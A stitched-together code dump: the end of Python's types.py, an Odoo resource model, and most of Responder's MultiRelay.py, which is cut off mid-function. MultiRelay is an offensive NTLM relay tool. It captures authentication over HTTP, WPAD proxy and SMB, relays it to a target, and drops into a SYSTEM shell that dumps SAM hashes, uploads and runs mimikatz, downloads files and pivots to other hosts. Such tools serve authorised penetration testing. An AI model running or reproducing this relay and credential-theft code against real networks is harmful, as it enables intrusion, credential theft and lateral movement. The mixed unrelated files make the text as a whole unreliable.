Define names for built-in types that aren't directly accessible as a builtin.
"""
import sys
# Iterators in Python aren't a matter of type but of protocol. A large
# and changing number of builtin types implement *some* flavor of
# iterator. Don't check the type! Use hasattr to check for both
# "__iter__" and "__next__" attributes instead.
def _f(): pass
FunctionType = type(_f)
LambdaType = type(lambda: None) # Same as FunctionType
CodeType = type(_f.__code__)
MappingProxyType = type(type.__dict__)
SimpleNamespace = type(sys.implementation)
def _g():
yield 1
GeneratorType = type(_g())
class _C:
def _m(self): pass
MethodType = type(_C()._m)
BuiltinFunctionType = type(len)
BuiltinMethodType = type([].append) # Same as BuiltinFunctionType
ModuleType = type(sys)
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
TracebackType = type(tb)
FrameType = type(tb.tb_frame)
tb = None; del tb
# For Jython, the following two types are identical
GetSetDescriptorType = type(FunctionType.__code__)
MemberDescriptorType = type(FunctionType.__globals__)
del sys, _f, _g, _C, # Not for export
# Provide a PEP 3115 compliant mechanism for class creation
def new_class(name, bases=(), kwds=None, exec_body=None):
"""Create a class object dynamically using the appropriate metaclass."""
meta, ns, kwds = prepare_class(name, bases, kwds)
if exec_body is not None:
exec_body(ns)
return meta(name, bases, ns, **kwds)
def prepare_class(name, bases=(), kwds=None):
"""Call the __prepare__ method of the appropriate metaclass.
Returns (metaclass, namespace, kwds) as a 3-tuple
*metaclass* is the appropriate metaclass
*namespace* is the prepared class namespace
*kwds* is an updated copy of the passed in kwds argument with any
'metaclass' entry removed. If no kwds argument is passed in, this will
be an empty dict.
"""
if kwds is None:
kwds = {}
else:
kwds = dict(kwds) # Don't alter the provided mapping
if 'metaclass' in kwds:
meta = kwds.pop('metaclass')
else:
if bases:
meta = type(bases[0])
else:
meta = type
if isinstance(meta, type):
# when meta is a type, we first determine the most-derived metaclass
# instead of invoking the initial candidate directly
meta = _calculate_meta(meta, bases)
if hasattr(meta, '__prepare__'):
ns = meta.__prepare__(name, bases, **kwds)
else:
ns = {}
return meta, ns, kwds
def _calculate_meta(meta, bases):
"""Calculate the most derived metaclass."""
winner = meta
for base in bases:
base_meta = type(base)
if issubclass(winner, base_meta):
continue
if issubclass(base_meta, winner):
winner = base_meta
continue
# else:
raise TypeError("metaclass conflict: "
"the metaclass of a derived class "
"must be a (non-strict) subclass "
"of the metaclasses of all its bases")
return winner
| gpl-3.0 | 2,450,574,333,059,934,000 | 30.356436 | 77 | 0.628671 | false |
ClearCorp/odoo-clearcorp | TODO-9.0/project_event/resource.py | 3 | 2336 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Addons modules by CLEARCORP S.A.
# Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api
class Resource(models.Model):
_name= 'project.event.resource'
_inherits = {'resource.resource': 'resource_id'}
@api.onchange('resource_type')
def onchange_resource_type(self):
self.unlimited = False
@api.multi
def name_get(self):
result = []
for resource in self:
if resource.code:
result.append((resource.id, "[%s] - %s" % (resource.code, resource.name or '')))
else:
result.append((resource.id, "%s" % resource.name or ''))
return result
@api.model
def name_search(self, name, args=None, operator='ilike', limit=100):
args = args or []
recs = self.browse()
if name:
recs = self.search([('code', operator, name)] + args, limit=limit)
if not recs:
recs = self.search([('name', operator, name)] + args, limit=limit)
return recs.name_get()
unlimited = fields.Boolean('Unlimited', help='This resource is able to '
'be scheduled in many events at the same time')
category_id = fields.Many2one('project.event.resource.category', string='Category')
resource_id = fields.Many2one('resource.resource', string='Resource',
ondelete='cascade', required=True) | agpl-3.0 | -7,036,138,707,060,302,000 | 39.293103 | 96 | 0.601884 | false |
lgandx/Responder | tools/MultiRelay.py | 1 | 39626 | #!/usr/bin/env python
# -*- coding: latin-1 -*-
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: [email protected]
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
if (sys.version_info > (3, 0)):
PY2OR3 = "PY3"
else:
PY2OR3 = "PY2"
sys.exit("For now MultiRelay only supports python 3. Try python3 MultiRelay.py ...")
import re
import os
import logging
import optparse
import time
import random
import subprocess
from threading import Thread
if PY2OR3 == "PY3":
from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
else:
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
try:
from Crypto.Hash import MD5
except ImportError:
print("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.")
print("You can install it on debian based os with this command: apt-get install python-crypto")
print("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n")
try:
import readline
except:
print("Warning: readline module is not available, you will not be able to use the arrow keys for command history")
pass
from MultiRelay.RelayMultiPackets import *
from MultiRelay.RelayMultiCore import *
from SMBFinger.Finger import RunFinger,ShowSigning,RunPivotScan
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../')))
from socket import *
__version__ = "2.5"
MimikatzFilename = "./MultiRelay/bin/mimikatz.exe"
Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe"
RunAsFileName = "./MultiRelay/bin/Runas.exe"
SysSVCFileName = "./MultiRelay/bin/Syssvc.exe"
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
if os.path.isfile(SysSVCFileName) is False:
print(color("[!]MultiRelay/bin/ folder is empty. You need to run these commands:\n",1,1))
print(color("apt-get install gcc-mingw-w64-x86-64",2,1))
print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv",2,1))
print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode",2,1))
print(color("\nAdditionally, you can add your custom mimikatz executables (mimikatz.exe and mimikatz_x86.exe)\nin the MultiRelay/bin/ folder for the mimi32/mimi command.",3,1))
sys.exit()
def UserCallBack(op, value, dmy, parser):
args=[]
for arg in parser.rargs:
if arg[0] != "-":
args.append(arg)
if arg[0] == "-":
break
if getattr(parser.values, op.dest):
args.extend(getattr(parser.values, op.dest))
setattr(parser.values, op.dest, args)
parser = optparse.OptionParser(usage="\npython %prog -t 10.20.30.40 -u Administrator lgandx admin\npython %prog -t 10.20.30.40 -u ALL", version=__version__, prog=sys.argv[0])
parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
parser.add_option('-p',action="store", help="Additional port to listen on, this will relay for proxy, http and webdav incoming packets.",metavar="8081",dest="ExtraPort")
parser.add_option('-u', '--UserToRelay', help="Users to relay. Use '-u ALL' to relay all users.", action="callback", callback=UserCallBack, dest="UserToRelay")
parser.add_option('-c', '--command', action="store", help="Single command to run (scripting)", metavar="whoami",dest="OneCommand")
parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (scripting)", metavar="whoami",dest="Dump")
options, args = parser.parse_args()
if options.TARGET is None:
print("\n-t Mandatory option is missing, please provide a target.\n")
parser.print_help()
exit(-1)
if options.UserToRelay is None:
print("\n-u Mandatory option is missing, please provide a username to relay.\n")
parser.print_help()
exit(-1)
if options.ExtraPort is None:
options.ExtraPort = 0
if not os.geteuid() == 0:
print(color("[!] MultiRelay must be run as root."))
sys.exit(-1)
OneCommand = options.OneCommand
Dump = options.Dump
ExtraPort = options.ExtraPort
UserToRelay = options.UserToRelay
Host = [options.TARGET]
Cmd = []
ShellOpen = []
Pivoting = [2]
def ShowWelcome():
print(color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1))
print('\nSend bugs/hugs/comments to: [email protected]')
print('Usernames to relay (-u) are case sensitive.')
print('To kill this script hit CTRL-C.\n')
print(color('/*',8,1))
print('Use this script in combination with Responder.py for best results.')
print('Make sure to set SMB and HTTP to OFF in Responder.conf.\n')
print('This tool listen on TCP port 80, 3128 and 445.')
print('For optimal pwnage, launch Responder only with these 2 options:')
print('-rv\nAvoid running a command that will likely prompt for information like net use, etc.')
print('If you do so, use taskkill (as system) to kill the process.')
print(color('*/',8,1))
print(color('\nRelaying credentials for these users:',8,1))
print(color(UserToRelay,4,1))
print('\n')
ShowWelcome()
def ShowHelp():
print(color('Available commands:',8,0))
print(color('dump',8,1)+' -> Extract the SAM database and print hashes.')
print(color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)')
print(color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)')
print(color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)')
print(color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)')
print(color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\')
print(color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)')
print(color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to')
print(color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)')
print(color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)')
print(color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)')
print(color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)')
print(color('help',8,1)+' -> Print this message.')
print(color('exit',8,1)+' -> Exit this shell and return in relay mode.')
print(' If you want to quit type exit and then use CTRL-C\n')
print(color('Any other command than that will be run as SYSTEM on the target.\n',8,1))
Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../"
Logs = logging
Logs.basicConfig(filemode="w",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
def NetworkSendBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return bytes(str(data), 'latin-1')
def NetworkRecvBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return str(data.decode('latin-1'))
def StructPython2or3(endian,data):
#Python2...
if PY2OR3 == "PY2":
return struct.pack(endian, len(data))
#Python3...
else:
return struct.pack(endian, len(data)).decode('latin-1')
def UploadContent(File):
with open(File,'rb') as f:
s = f.read()
FileLen = len(s.decode('latin-1'))
FileContent = s.decode('latin-1')
return FileLen, FileContent
try:
RunFinger(Host[0])
except:
raise
print("The host %s seems to be down or port 445 down."%(Host[0]))
sys.exit(1)
def get_command():
global Cmd
Cmd = []
while any(x in Cmd for x in Cmd) is False:
Cmd = [input("C:\\Windows\\system32\\:#")]
#Function used to make sure no connections are accepted while we have an open shell.
#Used to avoid any possible broken pipe.
def IsShellOpen():
#While there's nothing in our array return false.
if any(x in ShellOpen for x in ShellOpen) is False:
return False
#If there is return True.
else:
return True
#Function used to make sure no connections are accepted on HTTP and HTTP_Proxy while we are pivoting.
def IsPivotOn():
#While there's nothing in our array return false.
if Pivoting[0] == "2":
return False
#If there is return True.
if Pivoting[0] == "1":
print("pivot is on")
return True
def ConnectToTarget():
try:
s = socket(AF_INET, SOCK_STREAM)
s.connect((Host[0],445))
return s
except:
try:
sys.exit(1)
print("Cannot connect to target, host down?")
except:
pass
class HTTPProxyRelay(BaseRequestHandler):
def handle(self):
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
return None
if IsPivotOn():
return None
except:
raise
s = ConnectToTarget()
try:
data = self.request.recv(8092)
##First we check if it's a Webdav OPTION request.
Webdav = ServeOPTIONS(data)
if Webdav:
#If it is, send the option answer, we'll send him to auth when we receive a profind.
self.request.send(Webdav)
data = self.request.recv(4096)
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(2048) #got it here.
## Send HTTP Proxy
Buffer_Ans = WPAD_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth):
Response = WPAD_Auth_407_Ans()
self.request.send(str(Response))
data = self.request.recv(8092)
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
#and has not attempted before. While at it, let's grab his hash.
Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
if Username is not None:
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print("[+] SMB Session Auth sent.")
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None:
s.close()
self.request.close()
return None
else:
##Any other type of request, send a 407.
Response = WPAD_Auth_407_Ans()
self.request.send(str(Response))
except Exception:
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
class HTTPRelay(BaseRequestHandler):
def handle(self):
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
return None
if IsPivotOn():
return None
except:
raise
try:
s = ConnectToTarget()
data = self.request.recv(8092)
##First we check if it's a Webdav OPTION request.
Webdav = ServeOPTIONS(data)
if Webdav:
#If it is, send the option answer, we'll send him to auth when we receive a profind.
self.request.send(NetworkSendBufferPython2or3(Webdav))
data = self.request.recv(4096)
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(2048) #got it here.
## Send HTTP Response.
Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth):
Response = IIS_Auth_401_Ans()
self.request.send(str(Response))
data = self.request.recv(8092)
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
#and has not attempted before. While at it, let's grab his hash.
Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
if Username is not None:
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print("[+] SMB Session Auth sent.")
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None:
s.close()
self.request.close()
return None
else:
##Any other type of request, send a 401.
Response = IIS_Auth_401_Ans()
self.request.send(str(Response))
except Exception:
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
class SMBRelay(BaseRequestHandler):
def handle(self):
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
return None
except:
raise
try:
s = ConnectToTarget()
data = self.request.recv(8092)
##Negotiate proto answer. That's us.
if data[8:10] == b'\x72\x00':
Header = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x43\xc8", pid=pidcalc(data),mid=midcalc(data))
Body = SMBRelayNegoAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)))
packet1 = str(Header)+str(Body)
Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(4096)
## Make sure it's not a Kerberos auth.
if data.find(b'NTLM') != -1:
## Start with nego protocol + session setup negotiate to our target.
data, smbdata, s, challenge = GrabNegotiateFromTarget(data, s, Pivoting)
## Make sure it's not a Kerberos auth.
if data.find(b'NTLM') != -1:
##Relay all that to our client.
if data[8:10] == b'\x73\x00':
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
#NTLMv2 MIC calculation is a concat of all 3 NTLM (nego,challenge,auth) messages exchange.
#Then simply grab the whole session setup packet except the smb header from the client and pass it to the server.
t = smbdata[36:].decode('latin-1')
packet0 = str(head)+str(t)
buffer0 = longueur(packet0)+packet0
self.request.send(NetworkSendBufferPython2or3(buffer0))
data = self.request.recv(4096)
else:
#if it's kerberos, ditch the connection.
s.close()
return None
if IsSMBAnonymous(NetworkSendBufferPython2or3(data)):
##Send logon failure for anonymous logins.
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
t = SMBSessEmpty()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
self.request.send(NetworkSendBufferPython2or3(buffer1))
s.close()
return None
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
#and has not attempted before. While at it, let's grab his hash.
Username, Domain = ParseSMBHash(data,self.client_address[0],challenge,UserToRelay,Host[0],Pivoting)
if Username is not None:
##Got the ntlm message 3, send it over to SMB.
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34].decode('latin-1'),mid="\x03\x00")
t = data[36:].decode('latin-1')#Final relay.
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
if Pivoting[0] == "1":
pass
else:
print("[+] SMB Session Auth sent.")
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(4096)
#We're all set, dropping into shell.
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
#If runcmd is None it's because tree connect was denied for this user.
#This will only happen once with that specific user account.
#Let's kill that connection so we can force him to reauth with another account.
if RunCmd is None:
s.close()
return None
else:
##Send logon failure, so our client might authenticate with another account.
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
t = SMBSessEmpty()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
self.request.send(NetworkSendBufferPython2or3(buffer1))
data = self.request.recv(4096)
self.request.close()
return None
except Exception:
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
#Interface starts here.
def RunShellCmd(data, s, clientIP, Target, Username, Domain):
#Let's declare our globals here..
#Pivoting gets used when the pivot cmd is used, it let us figure out in which mode is MultiRelay. Initial Relay or Pivot mode.
global Pivoting
#Update Host, when pivoting is used.
global Host
#Make sure we don't open 2 shell at the same time..
global ShellOpen
ShellOpen = ["Shell is open"]
# On this block we do some verifications before dropping the user into the shell.
if data[8:10] == b'\x73\x6d':
print("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.")
print("[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
if data[8:10] == b'\x73\x8d':
print("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
if data[8:10] == b'\x73\x5e':
print("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n")
del ShellOpen[:]
return False
## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$:
## Tree Connect
if data[8:10] == b'\x73\x00':
GetSessionResponseFlags(data)#While at it, verify if the target has returned a guest session.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x43\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\C$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## Nope he doesn't.
if data[8:10] == b'\x75\x22':
if Pivoting[0] == "1":
pass
else:
print("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
# This one should not happen since we always use the IP address of the target in our tree connects, but just in case..
if data[8:10] == b'\x75\xcc':
print("[+] Tree Connect AndX denied. Bad Network Name returned.")
del ShellOpen[:]
return False
## Tree Connect on C$ is successfull.
if data[8:10] == b'\x75\x00':
if Pivoting[0] == "1":
pass
else:
print("[+] Looks good, "+Username+" has admin rights on C$.")
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## Run one command.
if data[8:10] == b'\x75\x00' and OneCommand != None or Dump:
print("[+] Authenticated.")
if OneCommand != None:
print("[+] Running command: %s"%(OneCommand))
RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
if Dump:
print("[+] Dumping hashes")
DumpHashes(data, s, Target[0])
os._exit(1)
## Drop into the shell.
if data[8:10] == b'\x75\x00' and OneCommand == None:
if Pivoting[0] == "1":
pass
else:
print("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n")
ShowHelp()
Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired")
print(color('Connected to %s as LocalSystem.'%(Target[0]),2,1))
while True:
## We either just arrived here or we're back from a command operation, let's setup some stuff.
if data[8:10] == b'\x75\x00':
#start a thread for raw_input, so we can do other stuff while we wait for a command.
t = Thread(target=get_command, args=())
t.daemon = True
t.start()
#Use SMB Pings to maintain our connection alive. Once in a while we perform a dumb read operation
#to maintain MultiRelay alive and well.
count = 0
DoEvery = random.randint(10, 45)
while any(x in Cmd for x in Cmd) is False:
count = count+1
SMBKeepAlive(s, data)
if count == DoEvery:
DumbSMBChain(data, s, Target[0])
count = 0
if any(x in Cmd for x in Cmd) is True:
break
##Grab the commands. Cmd is global in get_command().
DumpReg = re.findall('^dump', Cmd[0])
Read = re.findall('^read (.*)$', Cmd[0])
RegDump = re.findall('^regdump (.*)$', Cmd[0])
Get = re.findall('^get (.*)$', Cmd[0])
Upload = re.findall('^upload (.*)$', Cmd[0])
Delete = re.findall('^delete (.*)$', Cmd[0])
RunAs = re.findall('^runas (.*)$', Cmd[0])
LCmd = re.findall('^lcmd (.*)$', Cmd[0])
Mimi = re.findall('^mimi (.*)$', Cmd[0])
Mimi32 = re.findall('^mimi32 (.*)$', Cmd[0])
Scan = re.findall('^scan (.*)$', Cmd[0])
Pivot = re.findall('^pivot (.*)$', Cmd[0])
Help = re.findall('^help', Cmd[0])
if Cmd[0] == "exit":
print("[+] Returning in relay mode.")
del Cmd[:]
del ShellOpen[:]
return None
##For all of the following commands we send the data (var: data) returned by the
##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore.
##We also clean up the command array when done.
if DumpReg:
data = DumpHashes(data, s, Target[0])
del Cmd[:]
if Read:
File = Read[0]
data = ReadFile(data, s, File, Target[0])
del Cmd[:]
if Get:
File = Get[0]
data = GetAfFile(data, s, File, Target[0])
del Cmd[:]
if Upload:
File = Upload[0]
if os.path.isfile(File):
FileSize, FileContent = UploadContent(File)
File = os.path.basename(File)
data = WriteFile(data, s, File, FileSize, FileContent, Target[0])
del Cmd[:]
else:
print(File+" does not exist, please specify a valid file.")
del Cmd[:]
if Delete:
Filename = Delete[0]
data = DeleteFile(data, s, Filename, Target[0])
del Cmd[:]
if RegDump:
Key = RegDump[0]
data = SaveAKey(data, s, Target[0], Key)
del Cmd[:]
if RunAs:
if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName)
FileName = os.path.basename(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
Exec = RunAs[0]
data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName)
del Cmd[:]
else:
print(RunAsFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if LCmd:
subprocess.call(LCmd[0], shell=True)
del Cmd[:]
if Mimi:
if os.path.isfile(MimikatzFilename):
FileSize, FileContent = UploadContent(MimikatzFilename)
FileName = os.path.basename(MimikatzFilename)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
Exec = Mimi[0]
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:]
else:
print(MimikatzFilename+" does not exist, please specify a valid file.")
del Cmd[:]
if Mimi32:
if os.path.isfile(Mimikatzx86Filename):
FileSize, FileContent = UploadContent(Mimikatzx86Filename)
FileName = os.path.basename(Mimikatzx86Filename)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
Exec = Mimi32[0]
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:]
else:
print(Mimikatzx86Filename+" does not exist, please specify a valid file.")
del Cmd[:]
if Pivot:
if Pivot[0] == Target[0]:
print("[Pivot Verification Failed]: You're already on this host. No need to pivot.")
del Pivot[:]
del Cmd[:]
else:
if ShowSigning(Pivot[0]):
del Pivot[:]
del Cmd[:]
else:
if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName)
FileName = os.path.basename(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
RunAsPath = '%windir%\\Temp\\'+FileName
Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName)
